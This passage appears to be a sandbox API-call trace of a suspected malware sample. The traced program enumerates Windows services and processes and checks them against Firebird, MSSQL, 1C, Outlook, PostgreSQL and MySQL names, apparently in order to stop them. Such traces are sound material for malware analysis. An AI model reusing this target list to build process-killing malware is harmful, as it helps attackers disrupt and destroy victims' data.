lpString2="PlugPlay") returned 1 [0273.944] lstrlenW (lpString="Power") returned 5 [0273.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0273.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0273.945] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0273.945] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0273.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0273.945] lstrlenW (lpString="ProfSvc") returned 7 [0273.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0273.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0273.945] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0273.945] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0273.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0273.945] lstrlenW (lpString="RpcEptMapper") returned 12 [0273.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.945] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0273.945] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0273.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0273.945] lstrlenW (lpString="RpcSs") returned 5 [0273.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0273.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0273.945] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0273.945] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0273.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0273.945] lstrlenW (lpString="SamSs") returned 5 [0273.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0273.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0273.945] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0273.945] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0273.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0273.945] lstrlenW (lpString="Schedule") returned 8 [0273.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0273.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0273.945] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0273.945] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0273.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0273.945] lstrlenW (lpString="SENS") returned 4 [0273.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0273.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0273.946] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0273.946] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0273.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0273.946] lstrlenW (lpString="ShellHWDetection") returned 16 [0273.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.946] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0273.946] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0273.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0273.946] lstrlenW (lpString="Spooler") returned 7 [0273.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0273.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0273.946] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0273.946] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0273.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0273.946] lstrlenW (lpString="Themes") returned 6 [0273.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0273.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0273.946] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0273.946] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0273.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0273.946] lstrlenW (lpString="UxSms") returned 5 [0273.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0273.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0273.946] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0273.946] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0273.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0273.946] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0273.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0273.948] Process32FirstW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.948] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.948] lstrlenW (lpString="System") returned 6 [0273.948] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0273.948] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0273.948] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0273.948] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0273.948] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0273.948] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0273.948] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0273.948] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.949] lstrlenW (lpString="smss.exe") returned 8 [0273.949] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0273.949] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.949] lstrlenW (lpString="csrss.exe") returned 9 [0273.949] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.949] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.949] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.949] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.949] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.949] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.949] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.950] lstrlenW (lpString="wininit.exe") returned 11 [0273.950] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0273.950] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0273.950] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0273.950] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0273.950] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0273.950] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0273.950] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0273.950] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.950] lstrlenW (lpString="csrss.exe") returned 9 [0273.950] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.950] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.950] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.950] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.951] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.951] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.951] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.951] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.951] lstrlenW (lpString="winlogon.exe") returned 12 [0273.951] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0273.951] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0273.951] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0273.951] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0273.951] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0273.951] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0273.951] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0273.951] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.951] lstrlenW (lpString="services.exe") returned 12 [0273.951] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0273.951] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0273.951] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0273.952] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0273.952] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0273.952] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0273.952] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0273.952] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.952] lstrlenW (lpString="lsass.exe") returned 9 [0273.952] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0273.952] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0273.952] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0273.952] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0273.952] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0273.952] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0273.952] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0273.952] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0273.952] lstrlenW (lpString="lsm.exe") returned 7 [0273.952] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0273.952] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0273.952] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0273.952] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0273.952] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0273.953] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0273.953] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0273.953] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.953] lstrlenW (lpString="svchost.exe") returned 11 [0273.953] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.953] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.953] lstrlenW (lpString="svchost.exe") returned 11 [0273.953] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.953] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.954] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.954] lstrlenW (lpString="svchost.exe") returned 11 [0273.954] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.954] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.954] lstrlenW (lpString="svchost.exe") returned 11 [0273.954] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.954] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.954] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.955] lstrlenW (lpString="svchost.exe") returned 11 [0273.955] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.955] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.955] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.955] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.955] lstrlenW (lpString="audiodg.exe") returned 11 [0273.955] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.956] lstrlenW (lpString="svchost.exe") returned 11 [0273.956] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0273.956] lstrlenW (lpString="userinit.exe") returned 12 [0273.956] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.956] lstrlenW (lpString="explorer.exe") returned 12 [0273.956] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.956] lstrlenW (lpString="dwm.exe") returned 7 [0273.957] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.957] lstrlenW (lpString="svchost.exe") returned 11 [0273.957] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0273.957] lstrlenW (lpString="agent1c.exe") returned 11 [0273.957] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.957] lstrlenW (lpString="spoolsv.exe") returned 11 [0273.957] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0273.958] lstrlenW (lpString="reader_sl.exe") returned 13 [0273.958] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0273.958] lstrlenW (lpString="dllhost.exe") returned 11 [0273.958] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0273.958] lstrlenW (lpString="taskhost.exe") returned 12 [0273.958] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.959] lstrlenW (lpString="svchost.exe") returned 11 [0273.959] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0273.959] CloseHandle (hObject=0x380) returned 1 [0273.959] Sleep (dwMilliseconds=0x1f4) [0274.597] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc6a0 [0274.651] EnumServicesStatusExW (in: hSCManager=0x42dc6a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0274.652] GetLastError () returned 0xea [0274.652] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc9a) returned 0x4262fb8 [0274.652] EnumServicesStatusExW (in: hSCManager=0x42dc6a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xc9a, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0274.653] CloseServiceHandle (hSCObject=0x42dc6a0) returned 1 [0274.653] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0274.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0274.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0274.653] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0274.653] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0274.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0274.653] lstrlenW (lpString="AudioSrv") returned 8 [0274.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0274.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0274.653] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0274.653] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0274.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0274.653] lstrlenW (lpString="BFE") returned 3 [0274.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0274.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0274.653] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0274.653] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0274.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0274.654] lstrlenW (lpString="CryptSvc") returned 8 [0274.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0274.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0274.654] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0274.654] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0274.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0274.654] lstrlenW (lpString="CscService") returned 10 [0274.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0274.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0274.654] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0274.654] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0274.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0274.654] lstrlenW (lpString="DcomLaunch") returned 10 [0274.654] lstrcmpiW 